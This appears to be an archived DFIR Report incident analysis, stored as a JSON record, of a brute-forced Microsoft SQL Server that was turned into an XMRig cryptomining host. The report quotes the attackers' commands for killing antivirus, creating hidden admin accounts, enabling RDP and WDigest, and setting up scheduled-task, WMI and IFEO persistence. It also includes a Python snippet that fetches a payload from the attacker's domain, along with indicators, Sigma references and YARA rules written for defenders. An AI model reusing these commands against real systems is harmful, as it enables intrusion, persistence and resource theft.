{
	"id": "4dc6ff71-5795-4c35-8a5f-3fd2c6ed7e4e",
	"created_at": "2026-04-06T00:21:03.891249Z",
	"updated_at": "2026-04-10T03:20:04.570476Z",
	"deleted_at": null,
	"sha1_hash": "776f531892b1f77d433cc9d50ffaf806bf466e11",
	"title": "SELECT XMRig FROM SQLServer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4070961,
	"plain_text": "SELECT XMRig FROM SQLServer\r\nBy editor\r\nPublished: 2022-07-11 · Archived: 2026-04-05 12:39:25 UTC\r\nIn March 2022, we observed an intrusion on a public-facing Microsoft SQL Server. The end goal of this intrusion was to\r\ndeploy a coin miner. Although deploying a coin miner on a vulnerable server after successful exploitation is a common\r\nobjective for threat actors, this intrusion was slightly different and therefore more interesting.\r\nUS CERT recently published a malware analysis report related to XMRig coin miner on 23rd June 2022\r\n(https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-174a) and a security tip for defending against this threat\r\n(https://www.cisa.gov/uscert/ncas/tips/ST18-002).\r\nSummary\r\nOver the month of March, we observed a cluster of activity targeting MSSQL servers. The activity started via password\r\nbrute force attempts for the MSSQL SA account. These brute force attempts were observed repeatedly over the month.\r\nExamples included one cluster of 24,000 failed attempts from the same source, over a 27 hour effort, before they finally\r\nmanaged to guess the password. After having the correct credentials in their possession, the attackers then spawned a\r\ncommand shell via xp_cmdshell. According to Microsoft documentation, xp_cmdshell spawns a Windows command shell\r\nand passes in a string for execution.\r\nUsing xp_cmdshell, the threat actors were able to execute any command against the compromised server. They attempted to\r\nkill a bunch of AV programs by using taskkill.exe. The threat actors then wrote multiple commands to a batch file by using\r\necho and redirecting the strings to a file named 1.bat. After the batch file was written they then proceeded to perform the\r\nsame action echoing data into a file named bigfile.txt. After they finished writing to that file, they ran certutil to decode the\r\nbase64 data into an executable file. This executable was a privilege escalation tool that was used to execute the batch file to\r\nmake sure it executed with high enough permissions. They then executed the batch script. The commands included adding\r\nnew users to the local administrators group, enabling RDP, enabling WDigest, and hiding the newly created admin accounts\r\nusing the registry.\r\nOnce the threat actors had established persistence on the compromised host, they moved to their final objective, which was\r\nto install and run the XMRig miner. They dropped a Binary Managed Object Format (BMOF) file along with the miner\r\nitself, to do that. The threat actors used mofcomp.exe to decompile the BMOF binary and register a malicious class in the\r\nWMI repository. The event consumer of the newly created classes included a VBE script responsible for setting up and\r\nexecuting the XMRig miner with the correct settings.\r\nNo other activity beyond the mining was observed before the threat actors were evicted.\r\nServices\r\nWe offer multiple services including a Threat Feed service that tracks Command and Control frameworks such as Cobalt\r\nStrike, Sliver, BumbleBee, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be\r\nfound here.\r\nArtifacts for this case are limited due to the environment. A few log sources are available for this case under our Security\r\nResearcher and Organization services.\r\nAnalysis and reporting completed by @_pete_0 and @kostastsale\r\nInitial Access\r\nThe initial access took place via a brute-force attack, where the threat actors mainly targeted the System Admin (SA)\r\naccount.\r\nDuring the intrusions, we could see SQL Server event ID 18456 Failure Audit Events in the Windows application logs. We\r\nwitnessed more than 24,000 attempts from the same source before the threat actors successfully guessed the username and\r\npassword for the open SQL database.\r\nExample of the failed brute force attempts:\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 1 of 14\n\nFollowed by eventual successful logins.\r\nIt it likely that multiple successful logins were observed due to the automated access script that the threat actor was using.\r\nExecution\r\nIn the next attack stage, the threat actors established a cmd shell via Extended SQL Stored Procedure (xp_cmdshell). This\r\nprocess allows you to issue operating system commands directly to the Windows command shell using T-SQL code. An\r\nexample of command execution following a successful authentication to SQL database using xp_cmdshell:\r\n#Executing 'whoami' command on the remote host\r\nEXEC xp_cmdshell ‘whoami’\r\nAt a high level, the overall execution events can be depicted in the below diagram:\r\nIf we look into the Windows Application logs, specifically, the SQL Server event ID 15457, captures this as an\r\n‘xp_cmdshell’ event. Additionally, the SQL Server audit collection also captures similar events. The first commands\r\nexecuted by the threat actors included using taskkill for various anti-virus software.\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 2 of 14\n\ntaskkill /f /im egui.exe\r\ntaskkill /f /im QQPCTray.exe\r\ntaskkill /f /im SafeDogGuardCenter.exe\r\ntaskkill /f /im 360safe.exe\r\ntaskkill /f /im net1895.exe\r\ntaskkill /f /im ekrn.exe\r\ntaskkill /f /im 360rp.exe\r\ntaskkill /f /im QQPCMgr.exe\r\ntaskkill /f /im SafeDogServerUI.exe\r\ntaskkill /f /im SafeDogSiteIIS.exe\r\nThe threat actors also favored the execution of batch scripts on the compromised host. They used xp_cmdshell to write a\r\nbatch script (1.bat) to disk by redirecting strings to the file using echo commands.\r\nA second set of commands were also echoed into a file named bigfile.txt.\r\nOnce complete, certutil was used to decode the text and create an executable file.\r\n\"cmd.exe\" /c certutil -decode %USERPROFILE%\\AppData\\bigfile.txt %USERPROFILE%\\AppData\\bigfile.exe\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 3 of 14\n\nThis executable was then used in executing the 1.bat batch file.\r\n\"cmd.exe\" /c %USERPROFILE%\\AppData\\bigfile.exe -i -c %USERPROFILE%\\AppData\\1.bat\r\nPulling the hash of the file that was written, matches what appears to be a privilege escalation tool as seen in the hits from\r\nTHOR scanner:\r\nhttps://www.virustotal.com/gui/file/b67dfd4a818d10a017a4d32386cf4cd2a3974636bed04f27e45de6ada86a56d2/community\r\nWe believe this tool may be a variation of NetworkServiceExploit.exe, which attempts to use NetworkService for privilege\r\nescalation.\r\nAdditionally, we noticed the attackers dropping a file named “xitmf”. Looking into the file’s content, we noticed that the\r\nheader began with “FOMB”. When flipping the header, it spells BMOF, which indicates a Binary Managed Object Format\r\nfile. BMOF is a compiled version of a Managed Object Format (MOF) file. As per Microsoft’s official documentation:\r\n“Managed Object Format (MOF) is the language used to describe Common Information Model (CIM) classes.”\r\nMOF files are compiled using the Windows compiler tool mofcomp. Mofcomp.exe is also used to execute scripts by parsing\r\nthe MOF statements and creates new classes as part of the WMI repository. \r\ncmd.exe /c mofcomp.exe C:\\Windows\\SERVIC~1\\MSSQL$~1\\AppData\\Local\\Temp\\xitmf\r\nUsing the same mofcomp utility, its possible to decompile the BMOF to extract the script, using this command provided by\r\nMatt Graeber:\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 4 of 14\n\nThreat actors also transferred a Visual Basic Encoded (VBE) file that is executed on the host using cscript.exe. Once run, the\r\nscript would set up and execute the XMRig CoinMiner. During the execution, the password 579562847 is provided as an\r\nargument.\r\ncscript.exe /b /e:VBScript.Encode C:\\Windows\\SERVIC~1\\MSSQL$~1\\AppData\\Local\\Temp\\xit 579562847\r\nWe recognize that this is a VBE file from the file signature (“magic bytes”) at the first four bytes of the top of the file.\r\nWe can decode the VBE file using CyberChef:\r\nThe script has several functions, one to control the coin miner software on the host, and two, to configure the parameters\r\nsuch as user-agent strings through randomization:\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 5 of 14\n\nCommand interactions are done via WMI, for process discovery:\r\nProcess creation:\r\nIn the code, we observed further attempts to obfuscate sensitive attributable values:\r\nUsing the original password and some further de-obfuscation, we could decipher the values, in this case, the email address\r\nis:\r\nbj87670@gmail.com\r\nSome other deciphered values relate to coin mining pools:\r\ncrypto-pool[.]fr\r\nminergate[.]com\r\nWe also observed another dropper. Threat actors transferred the file ex.exe. Ex.exe is an Unrar application that they used to\r\nextract more malicious artifacts:\r\nCommandLine:\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 6 of 14\n\nex.exe x -prootBRUCE -y C:\\Windows\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\istx64f.rar C:\\Windows\\\u003cREDACTED\u003e\\AppData\\Loc\r\nFile Extracted:\r\nWinRing0x64.sys - XMRig cryptominer windows driver\r\nsmss.exe - XMRig coin miner\r\nkit.bat\r\nThe kit.bat script included instructions for executing the miner as well as for creating persistence via a schedule task. See the\r\ncontents of the script below:\r\n@echo off\r\nset usr=jood.06.10\r\nset app=smss.exe\r\ncd /d \"%~dps0\"\r\nif \"%1\"==\"-s\" (\r\nif EXIST %~dps0smss.exe start /min %~dps0smss.exe -c %usr%\r\nexit\r\nif EXIST %~dps0smss.exe start /min %~dps0smss.exe -c %usr%\r\nschtasks /delete /tn ngm /f\r\nschtasks /delete /tn cell /f\r\nschtasks /create /tn ngm /tr \"%~dps0kit.bat -s\" /sc hourly /ru \"\"\r\nschtasks /run /tn ngm\r\nexit\r\nSomething to note here, regarding the kit.bat script, is that we discovered that its contents were the topic of discussion in a\r\nChinese forum back in 2018.\r\nLink: hxxp://www[.]bathome[.]net/thread-48526-1-1.html\r\nPersistence\r\nThe threat actors wrote a batch script (1.bat) that contained commands for establishing persistence on the compromised host.\r\nWe see the creation of a new account and adding this account to the local administrators group.\r\nNET USER Adminv$ !67hCS14ORVg /ADD /expires:never\r\nNET LOCALGROUP Administrators /ADD Adminv$\r\nThey also made remote RDP connections possible by changing the fDenyTSConnections and UserAuthentication values to\r\n0.\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWO\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-TCP\" /v UserAuthe\r\nNET USER Adminv$ !67hCS14ORVg /ADD /expires:never\r\nNET LOCALGROUP Administrators /ADD Adminv$\r\nREG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v Adminv$ /t RE\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LocalAccountTokenFil\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 7 of 14\n\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWO\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-TCP\" /v UserAuthe\r\nNET LOCALGROUP Administrators /ADD Adminv$\r\nNET LOCALGROUP Administratoren /ADD Adminv$\r\nNET LOCALGROUP Administrateurs /ADD Adminv$\r\nNET LOCALGROUP Administratorzy /ADD Adminv$\r\nNET LOCALGROUP Administradores /ADD Adminv$\r\nFull Contents of 1.bat\r\nWe later see the threat actors writing another batch file to disk and executing it. The kit.bat script contained a scheduled task\r\nthat would run the kit.bat script on an hourly basis.\r\nschtasks /create /tn ngm /tr \"%~dps0kit.bat -s\" /sc hourly /ru \"\"\r\nschtasks /run /tn ngm\r\nAs explained in the execution tactic above, the threat actors installed a malicious WMI event subscription by including a\r\nVBScript that would execute on the compromised host. This was used as a method of persistence. The VBScript would\r\nexecute every day at 23:00 of the host local time.\r\nDecompiled .mof file containing the WMI event subscription.\r\nBreaking down the above screenshot, the WMI event subscription contains the below malicious EventConsumer and\r\nEventFilter classes:\r\nEvent Consumer:\r\nClass Name: ASEventConsumerdr\r\nContent: VBScript\r\nEvent Filter:\r\nName: EFNMdr (randomly named)\r\nTrigger: Every day at 23:00 local time\r\nLooking into the VBScript, we notice that it is reaching out to the domain mymst007[.]info on port 4000 to download one\r\nmore file and save it as temp file.\r\n1. WMI EventConsumer VBScript:\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 8 of 14\n\nWe used the below python code to emulate the VBScript and download the next stage payload:\r\nimport requests\r\nchars = []\r\ntext = \"\"\r\nresponse = requests.get(\"http://mst2.mymst007.info:4000/ex?e=1\")\r\nbody = response.text.split(',')\r\nfor i in body:\r\n chars.append(int(i) - 2)\r\nfor i in chars:\r\n text = text + chr\r\n1. Second stage payload downloaded and executed:\r\nThe final method of persistence we observed was the addition of an entry into the Image File Execution Option (IFEO)\r\nregistry key. By changing the Debugger value to a different executable, an attacker used IFEO to launch a program other\r\nthan the intended one. In this case, threat actors modified the below registry key to launch the miner executable (smss.exe)\r\ninstead of the svchost.exe binary.\r\n\"cmd.exe\" /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\smss.exe\" /f /v Debu\r\nPrivilege Escalation\r\nThe threat actors dropped a file named bigfile.txt which they used certutil to convert to bigfile.exe which we believe is a\r\nvariation of NetworkServiceExploit.exe as seen below.\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 9 of 14\n\nThis was used in this intrusion to run the batch file with the following command:\r\n\"cmd.exe\" /c %USERPROFILE%\\AppData\\bigfile.exe -i -c %USERPROFILE%\\AppData\\1.bat\r\nDefense Evasion\r\nThe threat actors attempted to kill antivirus tasks that could be running on the host. The commands targeted the below\r\nprocesses:\r\nQQPCTray.exe\r\nQQPCRTP.exe\r\nQQPCMgr.exe\r\nkavsvc.exe\r\nalg.exe\r\nAVP.exe\r\nSafeDogGuardCenter.exe\r\nSafeDogSiteIIS.exe\r\nSafeDogUpdateCenter.exe\r\nSafeDogServerUI.exe\r\nkxescore.exe\r\nkxetray.exe\r\n360safe.exe\r\n360sd.exe\r\n360rp.exe\r\n360rps.exe\r\n360tray.exe\r\nZhuDongFangYu.exe\r\nThe privilege escalation tool the threat actors brought with them was written as a text file and then decoded using certutil\r\ninto a binary file.\r\n\"cmd.exe\" /c certutil -decode %USERPROFILE%\\AppData\\bigfile.txt %USERPROFILE%\\AppData\\bigfile.exe\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 10 of 14\n\nAs we can see from the contents of the 1.bat script, the threat actors are adding a new local administrator user and they\r\nproceed with hiding the user account by adding it to the registry using “Special Accounts“.\r\nREG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v Adminv$ /t REG_DWORD /d\r\nThrough the execution of the initial batch script, 1.bat, they also disabled the User Access Control(UAC) remote restriction\r\nby setting the registry key value to “1”.\r\nreg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LocalAccountTokenFilterPolicy /\r\nThreat actors also enabled Wdigest.\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\r\nAfter many files were added to the system the threat actors included commands to remove them once their execution was\r\nfinished.\r\n\"cmd.exe\" /c DEL %USERPROFILE%\\AppData\\1.bat\r\n\"cmd.exe\" /c DEL %USERPROFILE%\\AppData\\bigfile.txt\r\n\"cmd.exe\" /c DEL %USERPROFILE%\\AppData\\bigfile.exe\r\nCredential Access\r\nDuring the initial access credentials were obtained via a brute-force attack against the exposed MSSQL server. No other\r\ncredential access was observed during this intrusion, although the threat actors did enable WDigest to make later credential\r\naccess easier.\r\nCommand and Control\r\nWe observed that the domain mymst007[.]info is used to download further payloads. The domain was created five years ago.\r\nWe have seen similar reports that make mention of the same infrastructure. Attacks associated with this domain include the\r\nsame or similar tactics techniques and procedures (TTPs).\r\nConnections related to the domain – mymst007[.]info\r\nImpact\r\nThe impact was concentrated on this one host. We did not see any further activity in this case. The compromised host had\r\nXMRig miner installed and running. The miner was also connecting to cryptomining pool such as minergate[.]com.\r\nIndicators\r\nFile\r\nWinRing0x64.sys\r\n0c0195c48b6b8582fa6f6373032118da\r\nd25340ae8e92a6d29f599fef426a2bc1b5217299\r\n11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5\r\nex.exe\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 11 of 14\n\na7bafac5ed29a68e0fff6eecc3f5bb3f\r\n4f19b6970e35b3d20f84a91e3af0d82c68096710\r\n428d06c889b17d5f95f9df952fc13b1cdd8ef520c51e2abff2f9192aa78a4b24\r\nkit.bat\r\n91931a2b1ae645004023e1b35fe57314\r\n9f5a7a293c92ef42374cf1471b653ed994446c15\r\n4905b7776810dc60e710af96a7e54420aaa15467ef5909b260d9a9bc46911186\r\nsmss.exe\r\ne579cd176b384b38eda6a0c61c51c274\r\n8a3b31ac12d9ac1a44707b1de75b8870189db83a\r\nd3c3f529a09203a839b41cd461cc561494b432d810041d71d41a66ee7d285d69\r\nxit\r\n88fba011db6e5122f4aa2c0343e11275\r\na2d34aeee2fb7c1ba57a11c03cc33e76f1217548\r\ncfa12bb31d58d30875b7a20ed05b5c100032b6a18802fbdf3913e70288e11a55\r\nxitmf\r\n0c8622c4871541e89d0173d5be0db8aa\r\nb01a88df39857417233d9bd3256f82d0fdcc63f8\r\nbeda317d74b8f1090e251205064e686d330a0502006a54dc94d528d6bd16c416\r\nNetwork\r\nminergate[.]com\r\nmymst007[.]info\r\nbj87670@gmail.com\r\nDetections \r\nSigma\r\nCustom Sigma rules\r\nSuspicious Commands by SQL Server\r\nMOFComp Execution\r\nHiding Local User Accounts\r\nSigmaHQ\r\nSystem File Execution Location Anomaly –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml\r\nSuspicious Shells Spawn by SQL Server –\r\nhttps://github.com/SigmaHQ/sigma/edit/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml\r\nSuspicious Execution of Taskkill –\r\nhttps://github.com/SigmaHQ/sigma/blob/04a3dfeb019fb326a2a411e87049c4a59d81bfb5/rules/windows/process_creation/proc_creation_win_susp_taskki\r\nNet.exe User Account Creation –\r\nhttps://github.com/SigmaHQ/sigma/blob/8bb3379b6807610d61d29db1d76f5af4840b8208/rules/windows/process_creation/proc_creation_win_net_user_a\r\nWdigest Enable UseLogonCredential –\r\nhttps://github.com/SigmaHQ/sigma/blob/b4cb047ae720b37b11f8506de7965dc29d5920be/rules/windows/registry/registry_set/registry_set_wdigest_enabl\r\nDNS Events Related To Mining Pools –\r\nhttps://github.com/SigmaHQ/sigma/blob/578c838277fdba88704ff3fed3268e87bd7277e0/rules/network/zeek/zeek_dns_mining_pools.yml\r\nYara\r\n rule miner_batch {\r\n meta:\r\n description = \"file kit.bat\"\r\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\"\r\n date = \"2022/07/10\"\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 12 of 14\n\nhash1 = \"4905b7776810dc60e710af96a7e54420aaa15467ef5909b260d9a9bc46911186\"\n strings:\n $a1 = \"%~dps0\" fullword ascii\n $a2 = \"set app\" fullword ascii\n $a3 = \"cd /d \\\"%~dps0\\\"\" fullword ascii\n $a4 = \"set usr=jood\" fullword ascii\n $s1 = \"schtasks /run\" fullword ascii\n $s2 = \"schtasks /delete\" fullword ascii\n $a5 = \"if \\\"%1\\\"==\\\"-s\\\" (\" fullword ascii\n condition:\n uint16(0) == 0xfeff and filesize \u003c 1KB and\n 3 of ($a*) and 1 of ($s*)\n}\nrule file_ex_exe {\n meta:\n description = \"files - file ex.exe.bin\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\"\n date = \"2022/07/10\"\n hash1 = \"428d06c889b17d5f95f9df952fc13b1cdd8ef520c51e2abff2f9192aa78a4b24\"\n strings:\n $s1 = \"d:\\\\Projects\\\\WinRAR\\\\rar\\\\build\\\\unrar32\\\\Release\\\\UnRAR.pdb\" fullword ascii\n $s2 = \"rar.log\" fullword wide\n $s3 = \" \" fullword ascii\n $s4 = \" processorArchitecture=\\\"*\\\"\" fullword ascii\n $s5 = \"%c%c%c%c%c%c%c\" fullword wide /* reversed goodware string 'c%c%c%c%c%c%c%' */\n $s6 = \" version=\\\"1.0.0.0\\\"\" fullword ascii\n $s7 = \"%12ls: RAR %ls(v%d) -m%d -md=%d%s\" fullword wide\n $s8 = \" hp[password] \" fullword wide\n $s9 = \" %s - \" fullword wide\n $s10 = \"yyyymmddhhmmss\" fullword wide\n $s11 = \"-------- %2d %s %d, \" fullword wide\n $s12 = \" Type Descriptor'\" fullword ascii\n $s13 = \"\\\\$\\\\3|$4\" fullword ascii /* hex encoded string '4' */\n $s14 = \" processorArchitecture=\\\"*\\\"\" fullword ascii\n $s15 = \" constructor or from DllMain.\" fullword ascii\n $s16 = \"----------- --------- -------- ----- ----\" fullword wide\n $s17 = \"----------- --------- -------- ----- -------- ----- -------- ----\" fullword wide\n $s18 = \"%-20s - \" fullword wide\n $s19 = \" publicKeyToken=\\\"6595b64144ccf1df\\\"\" fullword ascii\n $s20 = \" version=\\\"6.0.0.0\\\"\" fullword ascii\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 900KB and\n 8 of them\n}\nrule smss_exe {\n meta:\n description = \"files - file smss.exe.bin\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\"\n date = \"2022/07/10\"\n hash1 = \"d3c3f529a09203a839b41cd461cc561494b432d810041d71d41a66ee7d285d69\"\n strings:\n $s1 = \"mCFoCRYPT32.dll\" fullword ascii\n $s2 = \"gPSAPI.DLL\" fullword ascii\n $s3 = \"www.STAR.com\" fullword wide\n $s4 = \"4;#pMVkWTSAPI32.dll\" fullword ascii\n $s5 = \" \" fullword ascii\n $s6 = \"dYDT.Gtm\" fullword ascii\n $s7 = \"|PgGeT~^\" fullword ascii\n $s8 = \"* IiJ)\" fullword ascii\n $s9 = \"{DllB8qq\" fullword ascii\n $s10 = \"tfaqbjk\" fullword ascii\n $s11 = \"nrvgzgl\" fullword ascii\n $s12 = \" \" fullword ascii\n $s13 = \"5n:\\\\Tk\" fullword ascii\n $s14 = \" \" fullword ascii\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nPage 13 of 14\n\n$s15 = \"HHp.JOW\" fullword ascii\r\n $s16 = \" \u003c!--The ID below indicates application support for Windows 8 --\u003e\" fullword ascii\r\n $s17 = \" \u003c!--The ID below indicates application support for Windows 7 --\u003e\" fullword ascii\r\n $s18 = \"Wr:\\\\D;\" fullword ascii\r\n $s19 = \"px:\\\"M$\" fullword ascii\r\n $s20 = \" \u003ctrustInfo xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 23000KB and\r\n 8 of them\r\n}\r\nrule WinRing0x64_sys {\r\n meta:\r\n description = \"files - file WinRing0x64.sys.bin\"\r\n author = \"TheDFIRReport\"\r\n reference = \"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\"\r\n date = \"2022/07/10\"\r\n hash1 = \"11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5\"\r\n strings:\r\n $s1 = \"d:\\\\hotproject\\\\winring0\\\\source\\\\dll\\\\sys\\\\lib\\\\amd64\\\\WinRing0.pdb\" fullword ascii\r\n $s2 = \"WinRing0.sys\" fullword wide\r\n $s3 = \"timestampinfo@globalsign.com0\" fullword ascii\r\n $s4 = \"\\\"GlobalSign Time Stamping Authority1+0)\" fullword ascii\r\n $s5 = \"\\\\DosDevices\\\\WinRing0_1_2_0\" fullword wide\r\n $s6 = \"OpenLibSys.org\" fullword wide\r\n $s7 = \".http://crl.globalsign.net/RootSignPartners.crl0\" fullword ascii\r\n $s8 = \"Copyright (C) 2007-2008 OpenLibSys.org. All rights reserved.\" fullword wide\r\n $s9 = \"1.2.0.5\" fullword wide\r\n $s10 = \" Microsoft Code Verification Root0\" fullword ascii\r\n $s11 = \"\\\\Device\\\\WinRing0_1_2_0\" fullword wide\r\n $s12 = \"WinRing0\" fullword wide\r\n $s13 = \"hiyohiyo@crystalmark.info0\" fullword ascii\r\n $s14 = \"GlobalSign1+0)\" fullword ascii\r\n $s15 = \"Noriyuki MIYAZAKI1(0\u0026\" fullword ascii\r\n $s16 = \"The modified BSD license\" fullword wide\r\n $s17 = \"RootSign Partners CA1\" fullword ascii\r\n $s18 = \"\\\\/.gJ\u0026\" fullword ascii\r\n $s19 = \"14012709\" ascii\r\n $s20 = \"140127110000Z0q1(0\u0026\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 40KB and\r\n 8 of them\r\n}\r\nMITRE\r\nT1053.005 - Scheduled Task/Job: Scheduled Task\r\nT1136.001 - Create Account: Local Account\r\nT1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription\r\nT1564.002 - Hide Artifacts: Hidden Users\r\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\r\nT1027.004 - Obfuscated Files or Information: Compile After Delivery\r\nT1110.001 - Brute Force: Password Guessing\r\nT1070.004 - Indicator Removal on Host: File Deletion\r\nT1562.001 – Impair Defenses: Disable or Modify Tools\r\nT1546.012 - Event Triggered Execution: Image File Execution Options Injection\r\nT1140 - Deobfuscate/Decode Files or Information\r\nT1112 - Modify Registry\r\nT1078 - Valid Accounts\r\nT1134.001 - Token Impersonation/Theft\r\nInternal case #12780\r\nSource: https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/"
	],
	"report_names": [
		"select-xmrig-from-sqlserver"
	],
	"threat_actors": [],
	"ts_created_at": 1775434863,
	"ts_updated_at": 1775791204,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/776f531892b1f77d433cc9d50ffaf806bf466e11.pdf",
		"text": "https://archive.orkl.eu/776f531892b1f77d433cc9d50ffaf806bf466e11.txt",
		"img": "https://archive.orkl.eu/776f531892b1f77d433cc9d50ffaf806bf466e11.jpg"
	}
}